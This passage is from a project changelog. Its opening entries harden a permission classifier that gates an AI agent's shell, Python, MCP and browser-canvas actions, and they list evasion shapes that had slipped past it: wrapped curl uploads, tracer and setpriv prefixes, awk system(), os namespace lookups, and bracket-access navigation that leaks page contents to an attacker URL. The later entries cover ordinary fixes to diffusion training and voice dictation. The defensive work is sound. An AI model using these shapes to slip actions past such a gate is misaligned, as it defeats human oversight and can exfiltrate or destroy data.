(shutdown, reboot, halt, poweroff) was ungated, though the Python os.kill
equivalent already prompted. setcap grants file capabilities without sudo.
- A network client behind a wrapper (env curl -T) was missed because the client
check ran before the wrapper was resolved. slogin is a standard ssh alias and
was in neither set. wget spells the request method --method=DELETE.
- A tracer (strace, ltrace, valgrind, perf) runs the rest of the line as a
child, so the real command sat in argument position behind it.
- A redirection may precede the command word, so `</dev/null` hid what followed
from both scanners. `exec -a NAME cmd` puts a name where the command goes, and
the Windows `if exist FILE cmd` form puts an operand there.
- In Python: a walrus binds a module or a callee just like an assignment,
builtins.__import__ is the attribute form of __import__, and psutil ends a
process exactly as os.kill does. The psutil check is keyed on the import so an
unrelated .kill() on a user object keeps running.
- Over MCP: a credential carried in an argument NAME (Authorization, X-API-Key,
Cookie) goes out whatever its value looks like; collaborator and team-member
grants are access changes like the role verbs; and a recurring subscription
bills repeatedly.
* Bound the classifier's input and stop prompting on four more ordinary shapes
Found by simulating the whole corpus against pre-PR main on Linux, macOS and
Windows tokenizers and diffing the two, then feeding the classifier adversarial
input.
Robustness:
- The credential-path pattern backtracks superlinearly, so a long argument made
a single classification take seconds. Measured on main as well as here, so it
predates this change, but this change makes the auto gate the default and so
runs it on every call. Text far past any real path, and a command far past any
real command, now fail closed: they ask rather than spending unbounded time
deciding. Worst case over the adversarial set drops from a hang to 13 ms.
Over-prompting fixes:
- A container CLI reading its own state (docker ps, docker images, docker logs,
kubectl get) is inspection. The whole CLI was gated because the escape lives
in the arguments of run/exec, so the read subcommands were caught with it. An
unrecognised subcommand still asks, so the list can only be too small.
- A python payload is screened with the same analyzer the python tool uses, so
`python -c 'import torch; print(torch.__version__)'` runs while a destructive
one-liner still asks. A payload that does not parse fails closed, since shell
quoting may have mangled it. The other runtimes have no analyzer here and stay
gated.
- An assignment with no command after it runs nothing: every terminal call gets
its own shell process, so `export PATH=...` on its own dies with that process.
Verified against real bash rather than assumed.
- For the search paths other than PATH (PYTHONPATH and friends), a relative
entry points inside the session workdir, which is the agent's own directory,
so `PYTHONPATH=. pytest` runs. An absolute or escaping entry can shadow a real
module and still asks. PATH itself counts for every value, because a relative
entry there is the sharpest form of the hijack (`PATH=. ls` runs ./ls).
Net effect on the probe corpus, identical on all three platforms: ordinary and
inspection commands go from 99 of 136 prompting to 0, dangerous stays at 99 of
99, and the always-on hard-block set loses nothing and gains six entries.
* Tighten the permission-mode comments
Comment-only pass over the code this branch added. Every explanation is
collapsed to the fewest lines that still read clearly, redundant restatements
of the code are dropped, and a handful of blocks that had drifted away from the
constant or branch they describe are moved back next to it.
The non-obvious behaviours keep their note, just shorter: an unforced
`git worktree remove` refusing on a dirty worktree, a bare `-c` yielding an
empty attached value rather than None, `.` being the POSIX synonym for
`source`, prose keys being skipped rather than path keys allowlisted, and the
route keeping an unset mode lenient so non-streaming clients still work.
No code, string literal or test expectation changed.
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* Gate the navigation sinks reached by bracket access
The canvas egress check gated location.assign / location.replace and an
assignment to location.href, and it already handled bracket access for the
fetch family, but not for the navigation sinks. So `location['assign'](url)`
and `location['href'] = url` auto-ran and could navigate the preview frame to
an attacker URL with the page contents appended, which is the same egress the
dot forms already gate.
Both bracket forms are covered now, including a fully bracketed host
(`window['location']['href']`). The names are anchored to location so ordinary
bracket keys stay static: a string's own `['replace']`, an object's `['href']`,
and reading `location['href']` all still run without a prompt.
* Gate seven more ways a command reaches the shell in auto mode
git submodule foreach runs its argument in every submodule, so the payload is
a command in its own right; it now recurses through the terminal classifier and
through the hard-block scan. An awk program can shell out with system() or by
piping to "sh", so the program text is screened for those two shapes while
ordinary field work (awk '{print $1}') keeps running.
setpriv changes privilege and then execs what follows, so it is transparent to
the scan (setpriv --nnp rm -f x resolves rm) and its privilege-raising flags
(--reuid, --ambient-caps, --bounding-set) prompt on their own. fallocate
punches, zeroes or collapses a range in place, which destroys file contents,
so those flags prompt while plain allocation (-l SIZE) does not.
vars(os)["remove"] and os.__dict__["unlink"] resolve an attribute the same way
getattr does, so the module namespace dict is screened with the same key rules,
anchored to a filesystem module so an ordinary d["remove"] stays out.
Removing a package (pip uninstall torch, uv pip uninstall, conda remove) tears
down the environment the backend itself runs in; installing into it does not,
and stays automatic.
The listener check was anchored at command position, so a wrapper in front of
it (env python -m http.server, timeout 60 python -m uvicorn) slipped past. The
module after -m is now resolved at the token level, after wrapper resolution.
Adds 54 rows to the classifier tables covering both directions.
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- The cached-model listing tagged any repo with a model_index.json as
text-to-image, so a community pipeline the image loader's trust rule refuses
still got a row in the Images picker, and a detected-but-untrusted video repo
fell through to that same tag. Gate the image tag on the load path's rule and
hide an untrusted video repo outright.
- A routed diffusion pick only carries a GGUF filename, which is all the chat
picker has, so a curated single-file artifact arrived with no quant and was
loaded as a pipeline: from_pretrained on a repo with no model_index.json. Pass
the page's own catalog spec into the route pick, so a routed pick resolves to
exactly what a direct pick on that page resolves to.
- The dataset mutation endpoints checked is_active() and only then handed their
filesystem work to a thread, so a start reserving in that gap changed captions
or removed images underneath the preflight or the running trainer. The
interlock is now registered for the whole request under the lock reserve()
uses, and a start refuses while a mutation is open rather than waiting on it.
- GIF export held every kept frame as a paletted image before encoding; a clip
may be 2048x2048 for 1024 frames, and at the 12 fps target the step is 1, so
one export click could allocate over 4 GB and take the backend down. Downscale
past 720 px and widen the step to keep at most 300 frames.
- seed accepted any Python int, so an out-of-range one passed every preflight,
evicted the resident models, spawned the trainer and only then died in
torch.manual_seed. Bound it to torch's 64-bit range in the request and config.
- source_revision() scanned the checkpoint root plus text_encoder/tokenizer but
not vae, so swapping or fine-tuning the VAE in place left the conditioning
cache namespace unchanged and a warm run trained against latents from the old
checkpoint. Include the vae directory, like any other component the cached
tensors come from.
- /images/generate answers only when the images are saved, and secure mode's
tunnel caps an origin response near 100 seconds, which a native CPU or a
high-step run passes routinely. The page reported failure while the work kept
running, and a retry would duplicate it. A lost response (fetch rejection or
a gateway status the origin never answered) is now told apart from a refusal:
the page waits out generate-progress and reloads the gallery, so the run it
started still lands.
- The trainer emits the EMA adapter's path with the terminal event, but the
state update dropped it, so neither the run history nor either response
schema carried it and an enabled EMA left nothing discoverable. Keep it, and
show it next to the primary adapter.
- weighting_scheme advertised a choice of timestep sampling; sampling is always
logit-normal and the flag only selects the bell loss weights. Describe what
it does.
Comment-only pass over the Python this PR touches: drop what the code already
says, collapse multi-line explanations that still read on one line, and keep
the reasoning that is not recoverable from the code. No code, docstring
semantics or behaviour changes; verified with an AST comparison against the
previous revision, and the backend suite is unchanged (same 37 environment
failures as before: the API integration tests that need a live keyed server,
the flash-attn install hooks, and the GPU memory fields).
Reports the repos and exact files a pick needs so the download manager can stage
them with the loader's own file scope. A plain snapshot would add the packaged
root single, transformer shards and fp16 twins the loader never opens.
- The trainer keyed its persistent conditioning cache on family and
resolution only, while the keys themselves carry just the caption or
image content and crop variant. One cache directory reused for two
checkpoints, or for the same repo at a new revision, let a warm run
skip loading its encoders and train on the other model's embeddings
and latent statistics. Namespace on the base checkpoint and its
resolved revision as well. The revision helper now lives beside the
cache in diffusion_train_extras and the inference wrapper delegates to
it, so the two cannot disagree about what counts as the same source.
- The diffusion learning rate only checked positivity, but 1e309 floats
to inf and satisfies gt, so the route evicted the resident models and
started AdamW with an infinite rate: the first step destroys the
adapter while progress looks normal and the result is saved. Bound it
below 1.0, matching the LLM schema, which rejects inf for the same
reason.
Four bugs in the batched inference path, all found by review:
- A mixed-prompt batch sent a scalar negative prompt against a prompt
list. Z-Image asserts on the length, and Qwen-Image, Krea 2 and FLUX
true-CFG encode a batch-1 negative against batch-N latents and fail in
the transformer's text/image concat. Broadcast it to match the batch.
- The FBCache step-cache reset sat above the chunk loop. diffusers only
resets that state at the end of a successful call, so a forward that
raised (the OOM the backoff is meant to recover) left its own residual
behind and the halved retry died on a shape mismatch. Reset before
every forward instead.
- The conditioning cache keyed on the checkpoint alone, but a GGUF or
single-file load takes its text encoders from the companion base, so
the same checkpoint against a different base reused the previous
base's embeddings. Key the base too.
- Gallery records stored the base seed and the requested batch size even
when a prompts/seeds list drove the run, so restoring the second image
of seeds=[5, 99] replayed seed 5. List-driven outputs now record as
single-image recipes on their own seed.
Also bound strength above 0: every img2img pipeline derives its step
count from it, so 0 leaves zero denoising steps and either raises or, on
SDXL, crashes on empty latents.
Four correctness fixes on the training side:
- The labeling grid read caption sidecars under except OSError, but a
non-UTF-8 sidecar raises UnicodeDecodeError (a ValueError), so one bad
file 500d /diffusion/dataset/{name}/images and the grid could not be
opened to repair it. Read it as no caption, matching the info summary.
- An image past Pillow's own hard limit raises DecompressionBombError,
which derives straight from Exception and so escaped the upload guard's
(OSError, UnidentifiedImageError, ValueError) and returned 500 instead
of the intended 400.
- lora_dropout accepted 1.0, which makes PEFT build nn.Dropout(p=1.0):
lora_A and lora_B receive no gradient and the run saves an untrained
adapter while reporting normal progress. Bound it below 1.0, matching
the LLM request schema.
- The train panel re-seeded the base repo on every dataset refresh
because the family object identity changes on each info fetch, so an
upload or caption save silently replaced the user's chosen base and the
run started on a different model. Track the pick and only re-seed on a
real family change.
read_text raises UnicodeDecodeError, which is not an OSError, so one bad caption
sidecar or video sidecar 500d the info, upload and gallery routes. A flat image
now yields the all-black edge map instead of its own luminance, and the four DiT
loss knobs the trainer implements are declared so model_dump keeps them.
Resolve the drift between PR #6763 and current main:
- deletion: main moved cached-model deletion into hub/services/models/deletion.py,
so the PR's Images/Video in-use guards move there too as _diffusion_blocks_delete
and _video_blocks_delete, keeping main's fail-closed 503 contract.
- llama_keepwarm: take main's rewrite, re-apply the PR's image/video inference
suffixes so a generation in flight blocks an idle unload.
- routes/training: keep main's sidecar-swap 409 and resume_source_run_id, run
start_training in the worker thread the PR's unload hook needs.
- model picker: main renamed components/assistant-ui/model-selector ->
features/model-picker/... and rewrote pickers.tsx, so the PR's picker work is
ported onto main's version (task/catalog props, task gating of hub + cached +
local rows, single-device expanderGpuGb, fine-tuned section hidden when scoped)
rather than reverting main's pinned-models and per-model-config work.
- images/video pages: imports repointed at the new model-selector path.
- tests: delete-guard tests retargeted at the deletion service.
Typecheck, i18n parity and model-catalog checks pass.
* feat(studio): add DoRA support to studio
* fix: added use_dora fast encoder LoraConfig and gated use_dora on AdapterMethod
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* fix: dora button disabled on mac, add preflight guard on GGUF lora export, mismatch now correctly falls through to existing error instead of silently no-opping
* Studio: add dora to the WizardState LoRA variant union for consistency
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The Studio per-model config dropdown only surfaced bf16, q8_0, q5_1,
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f32. Add the missing options to KV_CACHE_DTYPES and align API field
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* fix(studio): persist connection model selections server-side
Remote Studio clients could see saved connections but not their enabled
model lists because models lived only in browser localStorage.
Store models and available_models in llm_providers and sync them through
the providers API so alternate clients inherit the same catalog state.
Fixes#7281
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Extract provider sync logic into sync-external-providers.ts and call it
from chat-page on mount so persisted model selections appear in the
Connected picker without opening Settings → Connections first.
* fix(studio): backfill connection models and preserve local options (#7298)
Address Codex P2 on remote connection persistence:
- Backfill localStorage model selections to /api/providers when backend
rows still have empty models_json (legacy upgrades)
- Carry promptCacheTtl and openaiContainerTtlMinutes through startup sync
- Await hydratePersistedSettings before syncing on ChatPage mount
Contract tests: 7 passed; npm run typecheck passed.
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* Studio: add Voice settings tab (dictation, dictionary, read aloud)
New Voice tab in Settings, placed just before About:
- Dictation: microphone picker, browser STT engine, recognition language,
and an inline mic test with a live transcript
- Dictation dictionary: entries rewrite matching speech to their exact
spelling and casing, applied in both dictation paths
- Recent dictations: last 20 final transcripts with copy and clear, so
text can be recovered if it lands in the wrong place
- Read aloud: optional button on assistant responses with two engines,
curated system voices (novelty and legacy voices filtered, quality
ranked, capped at 20) or the TTS audio model loaded in Unsloth via
/audio/generate (e.g. Orpheus), plus speed, pitch, volume and preview
Settings persist in localStorage (unsloth_voice_settings) and are read
at call time so changes apply without reloading the runtime. Adds en
keys plus the tab label for ja, zh-CN and pt-BR.
* Studio: drop the single option STT engine select, rename TTS option
The STT engine dropdown only had one entry, so it added noise without
giving a real choice. The engine row can come back once local STT
models land. Also renames the TTS engine option Unsloth TTS model to
Load TTS model to make the action clearer.
* Studio: harden Voice settings against edge cases found in simulation
Simulated the feature across Chromium, Firefox and WebKit plus node
level unit runs and backend contract checks. Fixes from the findings:
- Dictionary rewrite used a replacement string, so entries containing
dollar patterns corrupted transcripts (A$$AP became A$AP, $& injected
the match). Switched to the callback form of String.replace
- Persisted voice settings now validate types on hydration: non string
micDeviceId, dictationLanguage and ttsVoiceURI, and non boolean
ttsEnabled fall back to defaults instead of flowing into the UI
- Dictionary entries are trimmed, capped at 120 chars and re-sanitized
on hydration
- The Test dictation panel now falls back to the default microphone
when the saved device is unplugged, matching the composer adapter
Test coverage: 46 unit assertions (dictionary regex edge cases across
unicode, word boundaries and injection, voice curation for simulated
macOS, Windows and Linux voice inventories, corrupt storage merge),
13 backend contract checks against /audio/generate on an isolated
instance, and 60 browser assertions across the three engines covering
rendering, degradation without SpeechRecognition, curation in a real
DOM, dictionary persistence with unicode and dollar entries, the
no-model preview error path and corrupt localStorage recovery.
* Studio: address Voice settings review feedback
Verified each review comment before acting. Confirmed and fixed:
- Editing a dictionary entry was broken in two ways: the store trimmed
on every keystroke so spaces could not be typed, and clearing the
field deleted the entry and unmounted the input mid edit. Updates now
keep the raw value and a blur commit trims or removes the entry
- The unplugged mic fallback checked instanceof DOMException, but a
cross browser probe showed Firefox and WebKit throw
OverconstrainedError objects that are not DOMExceptions, so the
fallback never fired there. Matching on the error name now
- When the browser ended a dictation test on its own (silence timeout),
the mic stream stayed open. All recognition end paths now stop the
tracks and save the transcript through a single finalize path
- The studio TTS audio element now releases its WAV data URL as soon as
playback ends, fails or is cancelled
- Allow microphone now reports insecure contexts (no mediaDevices)
accurately instead of claiming access was blocked
- Voice tab copy moved into i18n keys per src/i18n/AGENTS.md, so locale
overlays can translate it; en is the baseline and parity passes
- unsloth_voice_settings added to the Reset all local preferences key
list so voice preferences obey the reset
- Non default microphones note that the system default is used when the
browser speech engine cannot bind a specific device, since browsers
without the start(track) overload ignore the argument silently
Re-ran the full simulation set after the changes: 46 unit assertions,
13 backend contract checks and 60 browser assertions across Chromium,
Firefox and WebKit all pass, plus a dedicated browser probe for the
dictionary editing behavior.
* Studio: use the chat mic icon in Voice settings for consistency
The Voice tab and its buttons used the hugeicons Mic02 glyph while the
chat composer uses a custom filled mic. Extract that composer icon into
a shared lib/mic-icon component, drop the duplicate inline copies in
thread.tsx and shared-composer.tsx, and use it for the Voice tab icon
and the tab's mic buttons so the microphone looks the same everywhere.
* Studio: address second round of Voice settings review feedback
Verified each new comment against the current code first. One item was
already fixed in the previous round (recording transcripts when the
browser ends a dictation test on its own). Confirmed and fixed:
- The microphone row showed a picker with generic names when browsers
enumerate unlabeled devices before permission, leaving no way to
grant access from the row. It now branches on whether labels are
visible and shows Allow microphone otherwise
- Compare chat dictation ignored the selected microphone. It now opens
the chosen device with the same fallback rules as the main adapter,
passes the track to recognition where supported and releases the
stream when recognition ends
- Closing the Voice tab cancelled the shared speechSynthesis even when
read aloud was playing a chat message. Cleanup now only cancels when
the tab owns an active preview
- Double clicking Start test could race two recognizers and leak the
first stream. A starting flag set before the getUserMedia await makes
start reentrancy safe
- Turning off the read aloud setting mid playback removed the only stop
control. The stop button now renders whenever a message is speaking
- When an engine lacks the start(track) overload, both dictation paths
now release the selected device stream before retrying with the
default microphone instead of holding it open
- Read aloud support no longer requires Web Speech synthesis: the
Unsloth TTS engine only needs audio playback, so it stays available
in WebViews without speechSynthesis, with a clear error if the system
engine is chosen there
Not addressed here: cancelling in flight backend TTS generation on
stop. The route runs generation in a worker thread without a
cancellation path, which is shared pre existing behavior with audio
chat generation and belongs in a backend change.
All suites re-run green: 46 unit, 13 backend contract and 60 browser
matrix assertions across Chromium, Firefox and WebKit, plus probes for
the unlabeled device branch and the double click race.
* Studio: drop empty and duplicate voiceURIs so the Voice tab never renders a crashing Select item
* Studio: guard dictation mic lifecycle in Voice test and Compare composer
Release a microphone opened after the component unmounts, and stop Compare
dictation on a permission or security failure instead of silently recording
from the default device, matching the main chat adapter.
* Studio: fix dictation and read-aloud lifecycle edge cases in Voice settings
- Join final dictation chunks with a space so recorded transcripts do not merge words
- Ignore a stale recognizer onend so a quick stop then restart is not torn down
- Use previewingRef so a double click on TTS preview does not orphan the first request
- Keep the read-aloud stop control visible when a new run starts while a message is spoken
- Stop the dictionary remove button from deleting an adjacent entry on a blur then click race
* Studio: trim redundant Voice settings comments
* Studio: fix Voice preview and Compare dictation edge cases
- Only cancel the shared speechSynthesis for a system-voice preview, so stopping
a Studio preview no longer stops an unrelated chat read-aloud
- Release the Studio preview audio and its WAV data URL on normal completion
- Iterate every finalized result in Compare dictation so batched phrases are kept
- Cap persisted recent dictations to the last 20 on hydration
* Studio: use clipboard fallback for recents and release failed preview audio
- Copy recent dictations via the copyToClipboard helper so the execCommand
fallback works in Safari and insecure http LAN contexts
- Release the Studio preview audio when play() rejects, not just on ended/error
* Studio: add local speech-to-text dictation engine
Add an offline dictation engine that transcribes with a local faster-whisper
model, alongside the existing browser (Web Speech) engine. The browser engine
streams audio to Apple or Google speech services and needs internet; the new
engine runs on the server, works offline, and drives any chat model without
evicting it (it loads in the backend process, separate from the model
subprocess). It also gives Firefox dictation, which has no Web Speech support.
Backend: a lazily-loaded, kept-warm faster-whisper sidecar and three routes
under /api/inference/audio (stt/status, stt/load, transcribe). faster-whisper
is torch-free, so this does not disturb the existing model stack.
Frontend: a Dictation engine setting (browser or local model), a curated model
picker with sizes, and MediaRecorder capture posted to the transcribe route.
The model warms automatically when the engine is selected, with live status.
* Studio: stream local STT transcription as you speak
Local dictation showed nothing until you stopped, because the whole clip was
transcribed once on stop. Now the growing recording is re-transcribed on a
fast pass every second and emitted as live interim text, with an accurate
final pass on stop. Partial recordings decode fine, and the model refines
earlier words as more audio arrives.
Adds an interim flag to the transcribe route (beam 1, no VAD) for the fast
preview pass; the final stop uses the accurate path.
* Studio: make local dictation stop instant and reliable
Stopping local dictation waited for a final network transcription before the
session ended, so the stop button did not flip and a second click ended the
session early and dropped the text. Now stop commits the live transcript
immediately, releases the mic at once, and ignores a second stop while
finalizing. Previews run more often so the committed text is current.
* Studio: record local dictation in short clips for reliable streaming
Re-transcribing a growing buffer every second got slower as it grew, flooded
the backend, showed stale words, and could leave the stop button stuck waiting
on a backlog. Record short independent clips instead and transcribe each once,
appending the text as you speak. Work per clip is bounded, so stopping is
prompt (with a hard timeout as a safety net) and long dictations stay smooth.
* Studio: dictate then transcribe once on stop, ChatGPT style
Local STT dictation streamed by re-transcribing the growing clip, which
was quadratic and saturated the backend (multi-second lag), and stop only
halted the recorder without releasing the mic, so it kept recording. Record
the microphone continuously, release it the instant the user stops, and
transcribe the whole clip once. Stopping is immediate and the transcript
lands in about a second. Also add the tiny model for the fastest option.
* Studio: surface dictation and read-aloud failures instead of failing silently
- Compare dictation reports microphone and speech-recognition errors via toast,
reusing the main chat adapter's describeMediaError and describeSpeechError
- Read-aloud toasts genuine model or synthesis failures while ignoring cancellations
* Studio: ChatGPT-style recording bar for dictation
Clicking the mic now drops the composer into a dedicated recording bar
with a live waveform, a discard (X) and a confirm (tick), instead of a
plain stop button. The tick stops recording and transcribes the clip;
the X throws the recording away and keeps whatever text was already in
the composer. The model adapter taps the mic with an analyser to drive
the waveform, and the router tracks the live session so the X can cancel
it without transcribing.
* Studio: transcribe dictation while speaking, ChatGPT layout
Match ChatGPT's recording layout: the bar now renders in place of the
input with the left plus button kept, the waveform in the middle, and
the discard and confirm buttons together on the right.
Cut the post-confirm delay by transcribing in the background as the user
talks. The audio is split at natural pauses (voice-activity detection off
the same analyser that drives the waveform) and each clip is transcribed
as it is cut, so confirming only has to finish the short final tail. The
model is also warmed when recording starts so the first run never pays a
cold load.
* Studio: ChatGPT waveform, hide tools while dictating, faster STT
Make the recording UI read like ChatGPT: the waveform is now a dense row
of round dots that rise into thin centered bars, and while dictating only
the plus button shows, with the mode badge and tool toggles hidden so the
bar is just the waveform and controls.
Speed up transcription: decode greedily (beam_size=1), which is several
times faster on CPU with negligible accuracy loss on short dictation
clips, and cap background segments at 6s so the final tail after confirm
stays short.
* Studio: finish ChatGPT voice bar and low-latency STT
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* Studio: full-width waveform with a timer that freezes on stop
Use the full-width waveform for the recording bar: brighter, bigger bars
that advance on a fixed cadence (keeping peaks between advances) so they
glide instead of racing by, inset from the composer edges. Keep a visible
timer and the green confirm button, matching the ChatGPT reference, and
freeze the timer and waveform the moment the user confirms.
* Studio: fix multilingual local dictation
* Studio: speed up dictation and release local STT
* Studio: harden dictation finalization and STT decoding
* Studio: restore Firefox dictation fallback
* Studio: add dictation history manager
* Studio: manage speech model downloads
* Studio: remove em dash from voice model label
* Studio: move dictation history into Voice
* Studio: source local STT from Unsloth Whisper models
Point the dictation STT sidecar and its Model Hub download entries at
Unsloth's Hugging Face Whisper repos (small, large-v3-turbo, large-v3)
and run them through Transformers, so Studio only ever downloads
Unsloth-uploaded weights. Drop faster-whisper and the Systran/mobiuslabs
repos; keep the Model Hub as the only download path via local_files_only,
and keep PyAV for audio decoding.
Device selection uses float16 on CUDA and float32 on MPS and CPU, since
Whisper's decoder is unstable in float16 on MPS and repeats tokens.
Shorten the model picker labels to name plus download size and update the
STT tests for the new backend.
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* Studio: smooth dictation waveform and keep pill height
* Studio: align STT model dropdown width and tidy voice copy
* Studio: guide to local engine when browser dictation is offline
* Studio: clarify voice section and STT model copy
* Studio: keep STT warm with training-aware eviction
* Harden STT lifecycle and browser compatibility
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* Fix model discovery test lint
* Harden cross-browser microphone errors
* Harden cross-browser microphone errors
* Surface voice test recognition errors and fall back to Studio TTS
- Voice test now toasts non-abort speech-recognition failures instead of
ending silently, matching the main and Compare dictation paths.
- Read-aloud routes to the backend model when the runtime lacks Web Speech
synthesis (audio-only WebView), so it no longer errors immediately.
* Fix reviewed STT lifecycle races
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* Fix read-aloud fallback controls
* Guard read-aloud stop when deleting a non-speaking message
aui.message().stopSpeaking() throws unless this message is the one being
read aloud, so calling it unconditionally rejected the delete handler before
the message was removed. Only stop speech when this message is speaking.
* Cap recent dictation transcript length before persisting
Recent dictations only limited entry count, so a long transcript stored the
full text in the persisted voice settings and a few could exceed the
localStorage quota, throwing synchronously from the uncaught dictation cleanup
path. Truncate each entry on save and on hydration, matching the dictionary cap.
* Studio: keep dictation mic clickable and guide to local model
Register the dictation adapter unconditionally so the mic stays enabled
for any engine and starts working right after switching to the local
model on an already-open thread.
When the browser engine cannot run (Firefox, Brave, non-secure origins),
clicking the mic shows a toast that points to the local speech-to-text
model instead of leaving a disabled button. The toast stacks its action
below the text with a fully rounded button.
* Studio: add bottom padding below the dictation guidance toast button
* Studio: increase bottom padding under the dictation toast button
* Studio: add bottom padding inside the dictation toast button
* Studio: add five Whisper defaults and custom model search
Add private UnslothAI Tiny and Base mirrors to the curated local STT choices while keeping Small as the default. Let users search or paste a Transformers-compatible Whisper repository and validate it end to end.
Keep short dictations in one clip to avoid repeated padded encoder work, then split longer recordings near Whisper's 30-second boundary.
Update hidden model filters and tests, including the CPU-only CI runtime stub for PyAV.
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* Studio: use public Unsloth Whisper repositories
Point the Tiny and Base dictation defaults to the public unsloth repositories and remove the private mirror references from model filtering and tests.
* Studio: update Whisper download sizes
Reflect the cleaned public Tiny and Base repositories in the curated model labels.
* Studio: right-align STT model size, fix dropdown wheel scroll, refresh sizes
- Show the download size on the right of each model row so long names
like Whisper Large v3 Turbo no longer hide it
- Update curated Whisper sizes to the safetensors weights actually
downloaded: Tiny 151 MB, Base 290 MB, Small 967 MB
- Drive the model list scroll from a wheel handler so the mouse wheel
scrolls it inside the Settings dialog, not just the scrollbar
- Add a search icon and shorten the placeholder to Search model
* Studio: do not search when a dictation model is picked, shrink repo label
- Treat the filled-in model text as a selection, not a query, so choosing
a model no longer kicks off a Hugging Face search
- Make the repository line under each model name smaller
* Studio: tighten dictation model and local engine descriptions
* Studio: keep model display on pick instead of the query, shrink row text
- Guard the combobox input so selecting a model shows its name and does
not echo the typed query back or start a search
- Map the item label to the friendly display so picks fill the field
- Reduce the model name and size text in each row
* Studio: show only the model name in the dictation field, shrink size label
- Drop the download size from the search field; the name alone is shown
once a model is selected, with sizes kept in the dropdown list
- Reduce the size label text in each row
* Studio: clarify the dictation model description
* Studio: drop Hugging Face from the dictation model description
* Studio: move the dictation dictionary to its own Manage subpage
- Replace the inline entry list with a Manage row, matching Dictation
history, so a long dictionary no longer crowds Voice settings
- Add a DictationDictionaryView subpage that holds the entry editor
* Studio: match STT field font, use best voice for System default
- Bump the dictation model field text to text-sm so it matches the
engine dropdown next to it
- Resolve the System default read-aloud voice to the top curated voice
instead of the browser default, which is a robotic legacy voice on macOS
* Studio: rerank read-aloud voices and drop duplicate voice entries
- Rank by vendor quality, then the user's locale, then a preferred list of
natural voices, so the best voice leads instead of the first alphabetically
- Collapse voices that macOS reports twice under one name and language
* Studio: fold dictionary and recents into the dictation section
- Drop the separate Dictation dictionary and Recent dictations headings;
their Manage rows now sit under Dictation, split by the row divider
- Shorten the custom spellings description
* Studio: add search and sort to dictation history
- Filter saved dictations by text with a search field
- Sort by newest, oldest, or A to Z; show a no-matches message
- Keep Clear all available regardless of the current filter
* Studio: settle cancelled STT loads before training and fix dictation review items
Wait for a cancelled STT load to exit and release its memory before
reporting it freed for training, so the loader cannot still be inside
from_pretrained()/.to(device) holding VRAM when the training subprocess
starts. A load that finishes before observing the cancel now gets
unloaded so the memory is actually reclaimed.
Clear the accelerator cache before the CPU fallback in load() so a failed
CUDA/MPS load does not strand reserved VRAM once the sidecar is marked
CPU-resident.
Send the saved Hugging Face token when polling STT download progress so a
gated or private repo resolves and shows the correct Load/Downloaded
state instead of reporting missing.
Mark the composer Dictate button as type="button" so clicking it does not
also submit the draft when the composer already has text or attachments.
* Studio: pin dictation settings per session and close STT startup races
Capture the STT model and language when a dictation session starts and
pass them to every queued segment and the warm-up load, so changing the
model or language mid-recording no longer transcribes the same clip with
the wrong model or a model that is not downloaded.
Check the local runtime at the top of transcribe(), before the model
cache lookup and the bounded audio decode, so a server missing PyTorch or
Transformers returns 501 up front instead of decoding a long clip first.
Treat the training startup window as active for STT device selection.
start_training frees VRAM in before_spawn but only assigns _proc later, so
a concurrent STT load could take the GPU that was just cleared. A startup
flag now reports training active from the free until the process is live,
forcing those loads to CPU; a finally clears it on every exit.
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* Studio: stub the STT runtime check in transcribe orchestration tests
transcribe() now verifies the local runtime up front, so the unit tests
that exercise transcription orchestration must treat the runtime as
present to keep passing where PyTorch, Transformers, and PyAV are not
installed. Stub ensure_stt_available in the shared fixture and restore
the real check in the availability and load-rejection tests.
* Harden custom Whisper dictation models
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* Add whisper.cpp dictation engine with per-engine downloads and history rework
Engines
- New GGML STT sidecar that runs a managed whisper-server subprocess with
idle unload, plus a pinned static build script (scripts/build_whisper_cpp.sh)
- Dictation engine picker now offers Browser, Local transcription
(whisper.cpp), and Local transcription (Transformers)
- Both local engines serve the same five curated Whisper models and download
them directly with byte-level progress reported by /audio/stt/status
- Models auto load on selection and when their download finishes
- Unload and training admission account for both engines
Benchmarks (Apple Silicon, greedy, warm, same checkpoints)
- whisper.cpp transcribes 2.4x to 5x faster than Transformers and loads in
about 0.45s vs 0.86s for Whisper Small
- whisper.cpp GGUF path is unchanged by the Transformers addition
(load 0.445s -> 0.444s, short clip 0.391s -> 0.347s, long 1.197s -> 1.129s)
Voice settings UI
- Plain curated model select replaces the searchable combobox
- Single download progress bar with transfer rate for both engines
- Dictation history now stores every dictation with Show more pagination,
a top Clear history action, and links back to the chat it was spoken into
- Archived chats dialog gets the same pagination
- Delete dialog offers deleting a dictation together with its chat
Tests: 88 backend STT tests pass, including new snapshot download coverage.
Frontend typecheck, lint, i18n parity, and production build pass.
* Merge local engines into one option and source GGML models from unslothai
Engine selection
- The dictation engine dropdown is back to two choices: Browser and Local
transcription. The selected model decides the backend: curated ids run
GGML checkpoints through whisper.cpp, searched Hugging Face repositories
run safetensors through Transformers
- Model picker lists the curated models and searches Hugging Face for other
Whisper repositories, validating them before selection. The trigger is a
plain button so the selection never renders inside a text input
- /audio/stt/status accepts a model query param so downloaded state works
for custom repositories; the engine param on load, transcribe, and
download routes is derived from the model everywhere
Model source
- Curated GGML checkpoints now download from the Unsloth-hosted
unslothai/whisper-*-GGUF repositories (one repo per model) instead of
ggerganov/whisper.cpp; cache lookups, progress totals, and in-flight blob
tracking are per-model
Fixes
- Voice settings and dictation history were not persisting: the quota-safe
localStorage wrapper was declared after the store that uses it, so the
persist storage factory failed silently. Every settings write also threw
mid-click, which kept the model picker popover from closing on selection
- is_model_downloaded now verifies config, preprocessor config, and real
weight files instead of trusting an offline snapshot lookup, so a partial
download left by an aborted fetch shows the Download button instead of
failing to load
- Removed whisper.cpp mentions from user-facing text: the ready status
shows Loaded instead of the runtime name, picker rows show the source
repository, and runtime error messages say local transcription runtime
Verified with automated browser sessions and live API checks: selection
closes the picker with no page errors, persisted settings hydrate on
reload, a stale partial snapshot triggers download then loads on MPS and
transcribes, and curated models download from the unslothai repos. 88
backend STT tests, typecheck, lint, i18n parity, and build pass.
* Skip the duplicate source line for custom models in the STT picker
A custom repository's display name is its id, so search results and the
appended current selection rendered the same string twice. The source
line now only renders when it differs from the name; curated rows keep
their name, unslothai source repository, and download size.
* Verify every shard of a sharded checkpoint in the downloaded check
A snapshot holding one of N shards (or a corrupt shard index) passed the
downloaded check and then failed at load. When model.safetensors.index.json
exists, every shard in its weight map must now be present. Found by
simulation; covered by a regression test.
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* Rename stale _starting references in the pump resilience tests
The startup flag on TrainingBackend was renamed to _spawn_in_progress but
two tests added alongside it still asserted on the old name, failing the
Python 3.11 to 3.13 CI jobs.
* Make the selected model row clearly highlighted in the STT picker
